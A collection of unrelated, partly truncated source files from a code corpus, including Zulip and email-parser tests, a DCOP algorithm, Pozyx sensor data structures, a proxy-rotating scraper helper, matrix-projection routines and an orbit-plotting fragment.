def test_add_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "Verona3", "op": "add"},
{"stream_id": stream.id, "topic": "Verona3", "op": "add"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
with mock.patch(
"zerver.views.muting.timezone_now",
return_value=datetime(2020, 1, 1, tzinfo=timezone.utc),
):
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertTrue(topic_is_muted(user, stream.id, "Verona3"))
self.assertTrue(topic_is_muted(user, stream.id, "verona3"))
remove_topic_mute(
user_profile=user,
stream_id=stream.id,
topic_name="Verona3",
)
def test_remove_muted_topic(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "vERONA3", "op": "remove"},
{"stream_id": stream.id, "topic": "vEroNA3", "op": "remove"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertFalse(topic_is_muted(user, stream.id, "verona3"))
def test_muted_topic_add_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=timezone_now(),
)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": stream.name, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic already muted")
data = {"stream_id": 999999999, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Invalid stream id")
data = {"topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
def test_muted_topic_remove_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": "BOGUS", "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream": stream.name, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream_id": 999999999, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
| StarcoderdataPython |
4848283 | <reponame>easydatapy/easydata
import pytest
from easydata import parsers
default_email = "<EMAIL>"
@pytest.mark.parametrize(
"test_data, result",
[
("<EMAIL>", default_email),
("contact:<EMAIL>'", default_email),
("contact;<EMAIL>", default_email),
('<input value="<EMAIL>">', default_email),
('<a href="mailto:<EMAIL>">Here</a>', default_email),
("Contact please <EMAIL>!!!", default_email),
(",<EMAIL>,", default_email),
("Contact please <EMAIL>!!!", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("<EMAIL>", "<EMAIL>"),
("Uppercase works to <EMAIL>", "<EMAIL>"),
("easydatapy@gmail", None),
("easydatapy@", None),
("@<EMAIL>", None),
(None, None),
("", None),
],
)
def test_email(test_data, result):
price_parser = parsers.Email()
assert price_parser.parse(test_data) == result
@pytest.mark.parametrize(
"test_data, domain, result",
[
("easydatapy", "gmail.com", default_email),
("easydatapy@", "gmail.<EMAIL>", default_email),
("Contact please <EMAIL>@", "gmail.<EMAIL>", default_email),
("Contact please easydatapy@ !!!", "gmail.com", None),
("easydatapy@@", "gmail.com", None),
("easydatapy@", "gmail", None),
],
)
def test_email_domain(test_data, domain, result):
price_parser = parsers.Email(domain=domain)
assert price_parser.parse(test_data) == result
def test_email_domain_lowercase():
test_data = "<EMAIL>"
assert parsers.Email(lowercase=True).parse(test_data) == "<EMAIL>"
| StarcoderdataPython |
3564612 | <filename>src/algorithms/ccg_centralized.py<gh_stars>1-10
import networkx as nx
import numpy as np
from algorithms.algorithm import Algorithm
from utils.ccg_utils import transform_dcop_instance_to_ccg, set_var_value
class CCGCentralized(Algorithm):
def __init__(self, name, dcop_instance, args={'max_iter':10, 'damping':0}, ccg=None, seed=1234):
super(CCGCentralized, self).__init__(name, dcop_instance, args, seed)
self.damping = args['damping']
if ccg is not None:
self.ccg = ccg
else:
self.ccg = transform_dcop_instance_to_ccg(dcop_instance)
self.msgs = {u: {v: np.asarray([0,0]) for v in self.ccg.neighbors(u)} for u in self.ccg.nodes()}
self.root = min([aname for aname in dcop_instance.agents])
self.variables = dcop_instance.variables.values()
self.var_ccg_nodes = {vname : [(u, data['rank']) for u, data in self.ccg.nodes(data=True)
if ('variable' in data and data['variable'] == vname)]
for vname in dcop_instance.variables}
def onStart(self, agt):
#agt.setRandomAssignment()
self.msgs = {u: {v: self.prng.randint(10, size=2)
for v in self.ccg.neighbors(u)} for u in self.ccg.nodes()}
if agt.name is self.root:
for var in self.variables:
v_val = var.value
# Set associated node to 0 and all others to 1
vc = []
for (u, r) in self.var_ccg_nodes[var.name]:
if v_val == 0 or v_val != 0 and r != v_val:
vc.append(u)
set_var_value(var, vc, self.var_ccg_nodes[var.name], self.prng)
def onCycleStart(self, agt):
pass
def onCurrentCycle(self, agt):
if agt.name != self.root:
return
ccg = self.ccg
weights = nx.get_node_attributes(ccg, 'weight')
for u in ccg.nodes():
# sum all messages from u's neighbors to itself
sum_msgs = np.sum(self.msgs[t][u] for t in ccg.neighbors(u))
# Send messages to neighbors
for v in ccg.neighbors(u):
sum_without_v = sum_msgs - self.msgs[v][u]
m = np.asarray([weights[u] + sum_without_v[1],
min(sum_without_v[0], sum_without_v[1] + weights[u])])
# Normalize values
m -= np.min(m) # m -= np.mean(m)
# Add noise to help stabilizing convergence
m += self.prng.normal(scale=1, size=len(m))
# Damping
if self.damping > 0:
m = self.damping * self.msgs[u][v] + (1-self.damping) * m
self.num_messages_sent += 1
self.msgs[u][v] = m
def onCycleEnd(self, agt):
if agt.name != self.root:
return
ccg = self.ccg
weights = nx.get_node_attributes(ccg, 'weight')
vertex_cover = []
for u in ccg.nodes():
sum_msgs = np.sum(self.msgs[t][u] for t in ccg.neighbors(u))
if sum_msgs[0] > sum_msgs[1] + weights[u]:
vertex_cover.append(u)
for var in self.variables:
set_var_value(var, vertex_cover, self.var_ccg_nodes[var.name], self.prng)
def onTermination(self, agt):
pass
| StarcoderdataPython |
6623241 | <filename>Backend/Pozyx/pypozyx/structures/generic.py
#!/usr/bin/env python
# TODO move this in the RST files.
"""
pypozyx.structures.generic - introduces generic data structures derived from ByteStructure
Generic Structures
As the name implies, contains generic structures whose specific use is up to the
user. You should use SingleRegister where applicable when reading/writing
a single register, and use Data for larger data structures.
Structures contained:
Data
THE generic data structure, a powerful way of constructing arbitrarily
formed packed data structures
XYZ
A generic XYZ data structure that is used in much 3D sensor data
SingleRegister
Data resembling a single register. Can choose size and whether signed.
UniformData
A variation on Data with all data being a uniform format. Questionably useful.
The use of Data:
Data creates a packed data structure with size and format that is entirely the user's choice.
The format follows the one used in struct, where b is a byte, h is a 2-byte int, and
i is a default-sized integer, and f is a float. In capitals, these are signed.
So, to create a custom construct consisting of 4 uint16 and a single int, the
following code can be used.
>>> d = Data([0] * 5, 'HHHHi')
or
>>> data_format = 'HHHHi'
>>> d = Data([0] * len(data_format), data_format)
"""
from pypozyx.structures.byte_structure import ByteStructure
def is_reg_readable(reg):
"""Returns whether a Pozyx register is readable."""
if (0x00 <= reg < 0x07) or (0x10 <= reg < 0x12) or (0x14 <= reg < 0x22) or (0x22 <= reg <= 0x24) or (
0x26 <= reg < 0x2B) or (0x30 <= reg < 0x48) or (0x4E <= reg < 0x89):
return True
return False
def is_reg_writable(reg):
"""Returns whether a Pozyx register is writeable."""
if (0x10 <= reg < 0x12) or (0x14 <= reg < 0x22) or (0x22 <= reg <= 0x24) or (0x26 <= reg < 0x2B) or (
0x30 <= reg < 0x3C) or (0x85 <= reg < 0x89):
return True
return False
def is_functioncall(reg):
"""Returns whether a Pozyx register is a Pozyx function."""
if (0xB0 <= reg <= 0xBC) or (0xC0 <= reg < 0xC9):
return True
return False
def dataCheck(data):
"""Returns whether an object is part of the ByteStructure-derived classes or not.
The function checks the base classes of the passed data object. This function enables
many library functions to be passed along its data as either an int/list or the properly
intended data structure. For example, the following code will result in the
same behaviour::
>>> p.setCoordinates([0, 0, 0])
>>> # or
>>> coords = Coordinates()
>>> p.setCoordinates(coords)
AND
>>> p.setNetworkId(0x6000)
>>> # or
>>> n = NetworkID(0x6000)
>>> p.setNetworkId(n)
Note that this only works for functions where you change one of the Pozyx's
settings. When reading data from the Pozyx, you have to pass along the correct
data structure.
Using dataCheck:
You might want to use this in your own function, as it makes it more robust
to whether an int or list gets sent as a parameter to your function, or a
ByteStructure-like object. If so, you can perform::
>>> if not dataCheck(sample): # assume a is an int but you want it to be a SingleRegister
>>> sample = SingleRegister(sample)
"""
if not(Data in type(data).__bases__ or ByteStructure in type(data).__bases__ or Data is type(data) or XYZ in type(data).__bases__ or SingleRegister in type(data).__bases__):
return False
return True
class XYZ(ByteStructure):
"""
Generic XYZ data structure consisting of 3 integers x, y, and z.
Not recommended to use in practice, as relevant sensor data classes are derived from this.
"""
physical_convert = 1
byte_size = 12
data_format = 'iii'
def __init__(self, x=0, y=0, z=0):
"""Initializes the XYZ or XYZ-derived object."""
self.data = [x, y, z]
def load(self, data, convert=True):
self.data = data
def __str__(self):
return 'X: {}, Y: {}, Z: {}'.format(self.x, self.y, self.z)
@property
def x(self):
return self.data[0] / self.physical_convert
@x.setter
def x(self, value):
self.data[0] = value * self.physical_convert
@property
def y(self):
return self.data[1] / self.physical_convert
@y.setter
def y(self, value):
self.data[1] = value * self.physical_convert
@property
def z(self):
return self.data[2] / self.physical_convert
@z.setter
def z(self, value):
self.data[2] = value * self.physical_convert
# TODO maybe use asdict()? Move to dataclasses?
def to_dict(self):
return {
"x": self.x,
"y": self.y,
"z": self.z,
}
class Data(ByteStructure):
"""Data allows the user to define arbitrary data structures to use with Pozyx.
The Leatherman of ByteStructure-derived classes, Data allows you to create your own
library-compatible packed data structures. Also for empty data, this is used.
The use of Data:
Data creates a packed data structure with size and format that is entirely the user's choice.
The format follows the one used in struct, where b is a byte, h is a 2-byte int, and
i is a default-sized integer, and f is a float. In capitals, these are unsigned.
So, to create a custom construct consisting of 4 uint16 and a single int, the
following code can be used.
>>> d = Data([0] * 5, 'HHHHi')
or
>>> data_format = 'HHHHi'
>>> d = Data([0] * len(data_format), data_format)
Args:
data (optional): Data contained in the data structure. When no data_format is passed, these are assumed UInt8 values.
data_format (optional): Custom data format for the data passed.
"""
def __init__(self, data=None, data_format=None):
if data is None:
data = []
self.data = data
if data_format is None:
data_format = 'B' * len(data)
self.data_format = data_format
self.set_packed_size()
self.byte_data = '00' * self.byte_size
def load(self, data, convert=True):
self.data = data
class SingleRegister(Data):
""" SingleRegister is container for the data from a single Pozyx register.
By default, this represents a UInt8 register. Used for both reading and writing.
The size and whether the data is a 'signed' integer are both changeable by the
user using the size and signed keyword arguments.
Args:
value (optional): Value of the register.
size (optional): Size of the register. 1, 2, or 4. Default 1.
signed (optional): Whether the data is signed. unsigned by default.
print_hex (optional): How to print the register output. Hex by default. Special options are 'hex' and 'bin'
other things, such as 'dec', will return decimal output.
"""
byte_size = 1
data_format = 'B'
def __init__(self, value=0, size=1, signed=False, print_style='hex'):
self.print_style = print_style
if size == 1:
data_format = 'b'
elif size == 2:
data_format = 'h'
elif size == 4:
data_format = 'i'
else:
raise ValueError("Size should be 1, 2, or 4")
if not signed:
data_format = data_format.capitalize()
Data.__init__(self, [value], data_format)
def load(self, data, convert=True):
self.data = data
@property
def value(self):
return self.data[0]
@value.setter
def value(self, new_value):
self.data[0] = new_value
def __str__(self):
if self.print_style is 'hex':
return hex(self.value).capitalize()
elif self.print_style is 'bin':
return bin(self.value)
else:
return str(self.value)
def __eq__(self, other):
if type(other) == SingleRegister:
return self.value == other.value
elif type(other) == int:
return self.value == other
else:
raise ValueError("Can't compare SingleRegister value with non-integer values or registers")
def __le__(self, other):
if type(other) == SingleRegister:
return self.value <= other.value
elif type(other) == int:
return self.value <= other
else:
raise ValueError("Can't compare SingleRegister value with non-integer values or registers")
def __lt__(self, other):
if type(other) == SingleRegister:
return self.value < other.value
elif type(other) == int:
return self.value < other
else:
raise ValueError("Can't compare SingleRegister value with non-integer values or registers")
def __gt__(self, other):
return not self.__le__(other)
def __ge__(self, other):
return not self.__lt__(other)
class SingleSensorValue(ByteStructure):
"""
Generic Single Sensor Value data structure.
Not recommended to use in practice, as relevant sensor data classes are derived from this.
"""
physical_convert = 1
byte_size = 4
data_format = 'i'
def __init__(self, value=0):
"""Initializes the XYZ or XYZ-derived object."""
self.data = [0]
self.load([value])
@property
def value(self):
return self.data[0]
@value.setter
def value(self, new_value):
self.data[0] = new_value
def load(self, data=None, convert=True):
self.data = [0] if data is None else data
if convert:
self.data[0] = float(self.data[0]) / self.physical_convert
def __str__(self):
return 'Value: {}'.format(self.value)
| StarcoderdataPython |
12819432 | <reponame>jixishi/python-Practice
# coding=utf-8
from fake_useragent import UserAgent # 下载:pip install
ua = UserAgent() # 实例化,需要联网但是网站不太稳定-可能耗时会长一些
headers = {
'User-Agent': ua.random # 伪装
}
import requests
def get_proxy():
return requests.get("http://127.0.0.1:5010/get/").json()
def delete_proxy(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def getHtml(path):
# ....
retry_count = 5
proxy = get_proxy().get("proxy")
while retry_count > 0:
try:
html = requests.get(path, headers=headers, proxies={"http": "http://{}".format(proxy)})
# 使用代理访问
return html
except Exception:
retry_count -= 1
# 删除代理池中代理
delete_proxy(proxy)
| StarcoderdataPython |
3218921 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-21 02:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='KPM',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('source_document', models.CharField(default='', max_length=255)),
('service_area', models.CharField(default='', max_length=255)),
('bureau', models.CharField(default='', max_length=255)),
('key_performance_measures', models.CharField(default='', max_length=255)),
('fy', models.CharField(default='', max_length=255)),
('budget_type', models.CharField(default='', max_length=255)),
('amount', models.IntegerField(blank=True, null=True)),
('units', models.CharField(default='', max_length=255)),
],
),
migrations.CreateModel(
name='OCRB',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('source_document', models.CharField(default='', max_length=255)),
('service_area', models.CharField(default='', max_length=255)),
('bureau', models.CharField(default='', max_length=255)),
('budget_category', models.CharField(default='', max_length=255)),
('amount', models.IntegerField(blank=True, null=True)),
('fy', models.CharField(default='', max_length=255)),
('budget_type', models.CharField(default='', max_length=255)),
],
),
]
| StarcoderdataPython |
6465399 | <reponame>mola1129/atcoder
N, M, X, Y = map(int, input().split())
x = list(map(int, input().split()))
y = list(map(int, input().split()))
x.sort()
y.sort()
for z in range(-100, 101):
if X < z and z <= Y and x[N - 1] < z and z <= y[0]:
print("No War")
exit()
print("War")
| StarcoderdataPython |
5049184 | #!/usr/bin/env python
import unittest
from spyne.util.cdict import cdict
class A(object):
pass
class B(A):
pass
class C(object):
pass
class D:
pass
class TestCDict(unittest.TestCase):
def test_cdict(self):
d = cdict({A: "fun", object: "base"})
assert d[A] == 'fun'
assert d[B] == 'fun'
assert d[C] == 'base'
try:
d[D]
except KeyError:
pass
else:
raise Exception("Must fail.")
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
5094951 | <filename>io_scene_xray/xray_inject_ui.py
from .ops import fake_bones, verify_uv, verify_uv_ui, joint_limits
from . import registry
from .ui import (
obj, mesh, material, armature, bone, action,
scene, view3d, collapsible, edit_helper
)
registry.module_requires(__name__, [
collapsible,
fake_bones,
joint_limits,
verify_uv.XRayVerifyUVOperator,
verify_uv_ui.XRAY_PT_VerifyToolsPanel,
obj,
mesh,
material,
armature,
bone,
action,
scene,
view3d,
edit_helper
])
| StarcoderdataPython |
3531997 |
import re
sentence = "What's the password katappa: '<PASSWORD>'!, cried katappa \nSo Bhallaldev fled"
dict = dict()
first_sentence = re.sub(r"[,#$^&*+!:]", '', sentence)
remove1 = re.sub(r"[\n\t\r\f\v]", '', first_sentence)
dict1 = []
dict2 = []
dict3 = []
def find_indices_of(char, in_string):
index = -1
while True:
index = in_string.find(char, index + 1)
if index == -1:
break
yield index
for i in find_indices_of("'", remove1):
dict1.append(i)
for value in dict1:
if remove1[int(value-1)] == " " or remove1[int(value + 1)] == " ":
dict2.append(value)
i = 0
if i == 0:
for quote in dict2:
string = remove1[:quote-i] + '' + remove1[quote+1-i:]
remove1 = string
dict3.append(remove1)
i = i + 1
final_sentence = dict3[-1]
for word in final_sentence.lower().split():
if word in dict:
dict[word] += 1
else:
dict[word] = 1
print(dict)
| StarcoderdataPython |
6543417 | <gh_stars>10-100
# extracts features of 1d array like data.
import numpy as np
import scipy
from scipy.stats import norm, rankdata
class Features(object):
def __init__(self, x):
self.x = x
class Trends(Features):
"""
Arguments:
x array/list/series: 1d array or array like whose features are to be calculated.
"""
def sen_slope(self, alpha=None):
# https://github.com/USGS-python/trend/blob/master/trend/__init__.py
"""A nonparametric estimate of trend.
Parameters
----------
x : array_like
Observations taken at a fixed frequency.
Notes
-----
This method works with missing or censored data, as long as less <20% of
observations are censored.
References
----------
.. [1] <NAME> <NAME>. 2002. Statistical Methods in Water Resources.
.. [2] https://vsp.pnnl.gov/help/vsample/nonparametric_estimate_of_trend.htm
"""
s = sen_diff(self.x)
s.sort()
if alpha:
N = len(s)
# calculate confidence limits
C_alpha = norm.ppf(1 - alpha / 2) * np.sqrt(np.nanvar(self.x))
U = int(np.round(1 + (N + C_alpha) / 2))
L = int(np.round((N - C_alpha) / 2))
return np.nanmedian(s), s[L], s[U]
else:
return np.nanmedian(s)
def seasonal_sen_slope(self, period=12, alpha=None):
"""A nonparametric estimate of trend for seasonal time series.
Paramters
---------
x : array_like
Observations taken at a fixed frequency.
period : int
Number of observations in a cycle. The number of seasons.
"""
s = 0
for season in np.arange(0, period):
x_season = self.x[season::period]
s = np.append(s, sen_diff(x_season))
s.sort()
if alpha:
# XXX This code needs to be verified
N = len(s)
# calculate confidence limits
C_alpha = norm.ppf(1-alpha/2)*np.sqrt(np.nanvar(self.x))
U = int(np.round(1 + (N + C_alpha)/2))
L = int(np.round((N - C_alpha)/2))
return np.nanmedian(s), s[L], s[U]
else:
return np.nanmedian(s)
def pettitt(self, alpha=0.05):
"""Pettitt's change-point test
A nonparameteric test for detecting change points in a time series.
Parameters
----------
x : array_like
Observations taken at a fixed frequency.
alpha : float
Significance level
Return
------
The index of the change point of the series, provided that it is
statistically significant.
"""
U_t = np.zeros_like(self.x)
n = len(self.x)
r = rankdata(self.x)
for i in np.arange(n):
U_t[i] = 2 * np.sum(r[:i+1]) - (i+1)*(n-1)
t = np.argmax(np.abs(U_t))
K_t = U_t[t]
p = 2.0 * np.exp((-6.0 * K_t**2)/(n**3 + n**2))
if p > alpha:
return t
else:
return np.nan
def mann_kendall(self, alpha=0.05):
"""Mann-Kendall (MK) is a nonparametric test for monotonic trend.
Parameters
----------
x : array
Observations taken at a fixed frequency.
Returns
-------
z : float
Normalized MK test statistic.
Examples
--------
>>> x = np.random.rand(100) + np.linspace(0,.5,100)
>>> z,p = kendall(x)
Attribution
-----------
Modified from code by <NAME> available at
https://github.com/mps9506/Mann-Kendall-Trend/blob/master/mk_test.py
"""
# n = len(self.x)
s = mk_score(self.x)
var_s = mk_score_variance(self.x)
z = mk_z(s, var_s)
# calculate the p_value
p_value = 2*(1-norm.cdf(abs(z))) # two tail test
return p_value
def seasonal_mann_kendall(self, period=12):
""" Seasonal nonparametric test for detecting a monotonic trend.
Parameters
----------
x : array
A sequence of chronologically ordered observations with fixed
frequency.
period : int
The number of observations that define period. This is the number of seasons.
"""
# Compute the SK statistic, S, for each season
s = 0
var_s = 0
for season in np.arange(period):
x_season = self.x[season::period]
s += mk_score(x_season)
var_s += mk_score_variance(x_season)
# Compute the SK test statistic, Z, for each season.
z = mk_z(s, var_s)
# calculate the p_value
p_value = 2*(1-norm.cdf(abs(z))) # two tail test
return p_value
def mk_z(s, var_s):
"""Computes the MK test statistic, Z.
Parameters
----------
s : float
The MK trend statistic, S.
var_s : float
Variance of S.
Returns
-------
MK test statistic, Z.
"""
# calculate the MK test statistic
if s > 0:
z = (s - 1)/np.sqrt(var_s)
elif s < 0:
z = (s + 1)/np.sqrt(var_s)
else:
z = 0
return z
def mk_score_variance(x):
"""Computes corrected variance of S statistic used in Mann-Kendall tests.
Equation 8.4 from Helsel and Hirsch (2002).
Parameters
----------
x : array_like
Returns
-------
Variance of S statistic
Note that this might be equivalent to:
See page 728 of Hirsch and Slack
References
----------
.. [1] <NAME> Hirsch, R.M. 2002. Statistical Methods in Water Resources.
"""
x = x[~np.isnan(x)]
n = len(x)
# calculate the unique data
unique_x = np.unique(x)
# calculate the number of tied groups
g = len(unique_x)
# calculate the var(s)
if n == g: # there is no tie
var_s = (n * (n - 1) * (2 * n + 5)) / 18
else: # there are some ties in data
tp = np.zeros_like(unique_x)
for i in range(len(unique_x)):
tp[i] = sum(x == unique_x[i])
var_s = (n * (n - 1) * (2 * n + 5) - np.sum(tp * (tp - 1) * (2 * tp + 5))) / 18
return var_s
class Stats(Features):
def auc(self):
return
def auto_corr(self):
return
def centroid(self):
return
def slope(self):
return
def zero_crossing_rate(self):
return
def sum_abs_diff(self):
return np.sum(np.abs(np.diff(self.x)))
def min_max_diff(self):
return np.abs(np.max(self.x) - np.min(self.x))
def mean_abs_dev(self):
return np.mean(np.abs(self.x - np.mean(self.x, axis=0)), axis=0)
def median_abs_dev(self):
"""Median absolute deviation"""
return scipy.stats.median_absolute_deviation(self.x, scale=1)
def rms(self):
"""Root mean square"""
return np.sqrt(np.sum(np.array(self.x) ** 2) / len(self.x))
def mk_score(x):
"""Computes S statistic used in Mann-Kendall tests.
Parameters
----------
x : array_like
Chronologically ordered array of observations.
Returns
-------
MK trend statistic (S).
"""
x = x[~np.isnan(x)]
n = len(x)
s = 0
for j in np.arange(1, n):
s += np.sum(np.sign(x[j] - x[0:j]))
return s
def sen_diff(x):
"""Sen's difference operator.
Paramaters
----------
x : array_like
Observations taken at a fixed frequency.
Returns
-------
Sen difference
"""
#x = x[~np.isnan(x)]
n = len(x)
N = int(n*(n-1)/2) # number of slope estimates
s = np.zeros(N)
i = 0
for j in np.arange(1, n):
#s[i:j+i] = (x[j] - x[0:j])/np.arange(1, j+1)
s[i:j+i] = (x[j] - x[0:j])/np.arange(j, 0, -1)
i += j
return s
if __name__ == "__main__":
f = Features(np.random.random(10))
| StarcoderdataPython |
361538 | <filename>pocsuite/lib/utils/sebug.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
from pocsuite.thirdparty.knowledge.webservice import Clinet
class seebugBase():
pass
| StarcoderdataPython |
3584226 | <reponame>wx100059/fast_projected_gradient_descent
# -*- coding: utf-8 -*-
"""
This algorithm compares the three different methods to compute the projection of a matrix.
"""
import matplotlib.pyplot as plt
import numpy as np
import cvxpy as cp
import time
"""
This function applies bisection algorithm to compute the project gradient descent.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def bisection(Y,k):
# transfer the original problem into argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Y_sgn = np.sign(Y)
abs_Y = np.abs(Y)
temp_Y = abs_Y.sum(axis = 1)
index = np.where(temp_Y > 1)
index = np.array(index)
# if |Y|_infty < k. Then directly set X = Y
if not len(index):
return Y
# solve problem argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Q = abs_Y[index,]
Q = np.transpose(np.squeeze(Q))
# compute the optimal value of Lagrange multiplier of the origional problem.
lambda_lower = np.zeros(len(index[0]));
lambda_upper = Q.max(axis = 0);
while np.linalg.norm(lambda_lower - lambda_upper) > 0.01:
lambda_middle = (lambda_lower + lambda_upper) / 2
temp_Q = np.maximum(Q - lambda_middle, 0)
temp_Q_sum = np.sum(temp_Q, axis = 0)
index_upper = np.where(temp_Q_sum <= k)
lambda_upper[index_upper] = lambda_middle[index_upper];
index_lower = np.where(temp_Q_sum > k)
lambda_lower[index_lower] = lambda_middle[index_lower];
Q = np.transpose(np.maximum(Q - lambda_middle,0))
X_output = np.array(Y);
X_output[index, :] = np.multiply(Q, Y_sgn[index,:]);
return X_output;
"""
This function applies bisection algorithm to compute the project gradient descent.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def order(Y,k):
# transfer the original problem into argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Y_sgn = np.sign(Y)
abs_Y = np.abs(Y)
temp_Y = abs_Y.sum(axis = 1)
index = np.where(temp_Y > 1)
index = np.array(index)
Q = np.squeeze(abs_Y[index,])
# solve problem argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
size = np.shape(Q)
Q = np.squeeze(Q)
P = np.sort(Q, axis = 1)
P = np.transpose(P)
P = P[::-1]
P = np.transpose(P)
P_temp = np.matmul((k - np.cumsum(P, axis = 1)),np.diag(np.divide(1, np.arange(1,size[1]+1))))
P_lambda = P + P_temp
lambda_index = np.argmax(P_lambda < 0, axis = 1)
lambda_index = np.mod(lambda_index - 1, size[1])
P = np.transpose(np.maximum(np.transpose(Q) + P_temp[np.arange(0,size[0]),lambda_index], 0))
P_output = np.array(Y)
P_output[index,:] = np.multiply(P, Y_sgn[index,:])
return P_output
"""
This function applies cvxpy to compute the projection of a matrix on a convex set.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def cvx(Y,k):
nrow = len(Y)
ncol = len(Y[0])
X = cp.Variable((nrow, ncol))
prob = cp.Problem(cp.Minimize(cp.norm(X-Y,"fro")),[cp.norm(X,"inf") <= k])
prob.solve()
return X.value
#Y = np.array([[1,1,1,1],[0.1,0.2,0.3,0.4],[-1,-1,-1,-1],[-0.1,-0.2,-0.3,-0.4]])
# we try to compute the matrix computation time from initial 10*10 matrix to final 1000*1000 matrix.
start = 10
end = 100
step = 10
length = int((end - start -1) / step) + 1
run_time1 = np.empty(length) # store the computation time of bisection based algorithm
run_time2 = np.empty(length) # store the computation time of order based algorithm
run_time3 = np.empty(length) # store the computation time of using cvxpy package
matrix_size = np.arange(start,end,step)
index = 0
k = 1
for i in matrix_size:
# create the n*n random matrix Y and then compute the corresponded projected matrix X
Y = 5 * np.random.rand(i,i)
begin_time = time.clock()
X1 = bisection(Y,k)
run_time1[index] = time.clock() - begin_time
X2 = order(Y,k)
run_time2[index] = time.clock() - run_time1[index] - begin_time
# X3 = cvx(Y,k)
# run_time3[index] = time.clock() - run_time2[index] - run_time1[index] - begin_time
index = index + 1
plt.plot(matrix_size, run_time1, label='bisection')
plt.plot(matrix_size, run_time2, label='order')
#plt.plot(matrix_size, run_time3, label='cvx')
plt.xlabel('matrix size n')
plt.ylabel('run time/s')
plt.title("Run time comparision")
plt.legend()
plt.show() | StarcoderdataPython |
9722995 | def Halo_Plot(Data):
##### HALO ORBITS PLOTTING TOOL #####
#
# Importing required functions
#
import numpy as np
from scipy import linalg
from scipy.integrate import solve_ivp
from .intFun import ThreeBodyProp, DiffCorrection
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Initial conditions
if Data['flags'][0] or Data['flags'][1] or Data['method'] == 'insitu':
[x0, z0, vy0] = Data['IC']
else:
fid = open(Data['IC'],'r')
info = fid.readlines()
IC = []
for i in info:
if i.split()[0] == '#':
IC.append(i.split()[-1])
if len(IC) == 3:
[x0, z0, vy0] = IC
elif len(IC) == 6:
[x0, z0, vy0] = [IC[0], IC[2], IC[4]]
else:
raise Exception('Halo_Num_Comp:ICError.' +\
' The text file selected does not have the right format!')
q0 = np.array([x0, 0, z0, 0, vy0, 0])
